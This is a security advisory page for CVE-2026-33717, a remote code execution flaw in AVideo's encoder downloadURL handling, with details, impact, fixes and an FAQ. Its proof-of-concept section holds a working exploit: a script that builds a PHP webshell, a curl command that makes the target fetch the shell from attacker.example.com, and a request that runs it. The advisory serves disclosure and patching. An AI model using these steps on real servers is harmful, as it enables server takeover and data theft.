CVE-2026-33717: AVideo Vulnerable to Remote Code Execution via Persistent PHP Temp File in Encoder downloadURL with Resolution Validation Abort

Published Mar 23, 2026
·
Updated

Summary

The downloadVideoFromDownloadURL() function in objects/aVideoEncoder.json.php saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including .php). By providing an invalid resolution parameter, an attacker triggers an early die() via forbiddenPage() before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the web root at videos/cache/tmpFile/.

Details

The vulnerability is a race-free file upload leading to RCE, exploiting a logic flaw in the error handling order of operations.

Step 1 — File download preserves dangerous extension:

In objects/aVideoEncoder.json.php, when a downloadURL parameter is provided, the file is downloaded and saved with the URL's original basename:

php // objects/aVideoEncoder.json.php:361-365 $FILES['video']['name'] = basename($downloadURL); // preserves .php extension $temp = Video::getStoragePath() . "cache/tmpFile/" . $FILES['video']['name']; makepath($temp); $bytesSaved = fileputcontents($temp, $file);

The format parameter (validated against $global['allowedExtension'] at line 42) is only used later for the final destination filename (line 238), not for the temp file. The temp file uses basename($downloadURL) directly, allowing any extension including .php.

Step 2 — Resolution validation aborts after file write:

After the file is downloaded and written to disk (line 156), the resolution is validated:

php // objects/aVideoEncoder.json.php:229-233 if (!inarray($REQUEST['resolution'], $global['avideopossibleresolutions'])) { $msg = "This resolution is not possible {$REQUEST['resolution']}"; errorlog($msg); forbiddenPage($msg); // calls die() — execution stops here }

The forbiddenPage() function (in objects/functionsSecurity.php:567-573) detects the JSON content type set at line 26 and calls die():

php if (empty($unlockPassword) && isContentTypeJson()) { // ... die(jsonencode($obj)); // line 573 — execution terminates }

Step 3 — Cleanup never reached:

The decideMoveUploadedToVideos() call at line 243, which would move the temp file to its final destination with the safe format extension, is never reached because forbiddenPage() terminates execution first.

Step 4 — No execution restrictions on temp directory:

The videos/cache/tmpFile/ directory has no .htaccess file restricting PHP execution. The root .htaccess FilesMatch on line 73 blocks extensions matching php[a-z0-9]+ (e.g., .php5, .phtml) but does not match plain .php.

PoC

Prerequisites: An authenticated user account with canUpload permission. An attacker-controlled server hosting a PHP payload file at least 20KB in size.

Step 1 — Prepare the PHP payload (on attacker server):

bash Create a PHP webshell padded to >=20KB to pass the minimum size check python3 -c " payload = b'<?php echo \"RCE:\".phpuname(); ?>' padding = b'\n' + b'/' (20001 - len(payload)) open('shell.php', 'wb').write(payload + padding) " Host it on an attacker-controlled server (e.g., https://attacker.example.com/shell.php)

Step 2 — Trigger the download with invalid resolution:

bash curl -X POST 'https://target.example.com/objects/aVideoEncoder.json.php' \ -d 'user=uploaderusername' \ -d 'pass=uploaderpassword' \ -d 'format=mp4' \ -d 'downloadURL=https://attacker.example.com/shell.php' \ -d 'resolution=9999'

Expected response: {"error":true,"msg":"This resolution is not possible 9999","forbiddenPage":true}

Step 3 — Access the persisted PHP file:

bash curl 'https://target.example.com/videos/cache/tmpFile/shell.php'

Expected output: RCE:Linux target 5.15.0-... — confirming arbitrary PHP code execution on the server.

Impact

An authenticated user with standard upload permissions can achieve Remote Code Execution on the server. This allows:

- Full server compromise — read/write arbitrary files, execute system commands - Access to database credentials and all stored user data - Lateral movement to other services on the same network - Modification or destruction of all video content and platform configuration - Use of the server as a pivot point for further attacks

The attack requires only a single HTTP request (plus hosting a payload file) and leaves no trace in the application's normal upload/video processing logs beyond the download attempt.

Recommended Fix

Fix 1 (Primary) — Validate file extension in downloadVideoFromDownloadURL():

php // objects/aVideoEncoder.json.php — in downloadVideoFromDownloadURL(), after line 360 function downloadVideoFromDownloadURL($downloadURL) { global $global, $obj; $downloadURL = trim($downloadURL);

// ... existing SSRF check ...

// NEW: Validate the file extension against allowed extensions $urlExtension = strtolower(pathinfo(parseurl($downloadURL, PHPURLPATH), PATHINFOEXTENSION)); if (!inarray($urlExtension, $global['allowedExtension'])) { errlog("aVideoEncoder.json:downloadVideoFromDownloadURL blocked dangerous extension: " . $urlExtension); return false; }

// ... rest of function ... }

Fix 2 (Defense in depth) — Move resolution validation before file download:

php // objects/aVideoEncoder.json.php — move lines 227-236 to BEFORE line 154 // Validate resolution BEFORE downloading anything if (!empty($REQUEST['resolution'])) { if (!inarray($REQUEST['resolution'], $global['avideopossibleresolutions'])) { $msg = "This resolution is not possible {$REQUEST['resolution']}"; errorlog($msg); forbiddenPage($msg); } } // Then proceed with download...

Fix 3 (Defense in depth) — Add .htaccess to temp directory:

Create videos/cache/tmpFile/.htaccess: apache Deny execution of all scripts in temp directory <FilesMatch "\.(?i:php|phtml|phar|php[0-9]|shtml)$"> Require all denied </FilesMatch> phpflag engine off

Other sources

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the downloadVideoFromDownloadURL() function in objects/aVideoEncoder.json.php saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including .php). By providing an invalid resolution parameter, an attacker triggers an early die() via forbiddenPage() before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the web root at videos/cache/tmpFile/. Commit 6da79b43484099a0b660d1544a63c07b633ed3a2 contains a patch.

MITRE

Affected Software

3 affected components
WWBN AVideo<=26.0
WWBN AVideo<=26.0
composer/wwbn/avideo<=26.0

Event History

Mar 23, 2026
CVE Published
via MITRE·06:48 PM
Data Sourced
via MITRE·06:48 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·07:16 PM
RemedyDescriptionSeverityWeaknessAffected Software
Mar 25, 2026
Advisory Published
via GitHub·09:28 PM
Data Sourced
via GitHub·09:28 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-33717?

CVE-2026-33717 is a critical vulnerability that allows for remote code execution in AVideo.

2

How do I fix CVE-2026-33717?

To fix CVE-2026-33717, you should upgrade AVideo to version 26.1 or later.

3

What versions of AVideo are affected by CVE-2026-33717?

AVideo versions up to and including 26.0 are affected by CVE-2026-33717.

4

What kind of attack is possible with CVE-2026-33717?

CVE-2026-33717 allows attackers to execute arbitrary code on the server via a persistent PHP temp file.

5

Is CVE-2026-33717 exploitative with just user interaction?

CVE-2026-33717 can be exploited remotely without user interaction, making it particularly dangerous.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203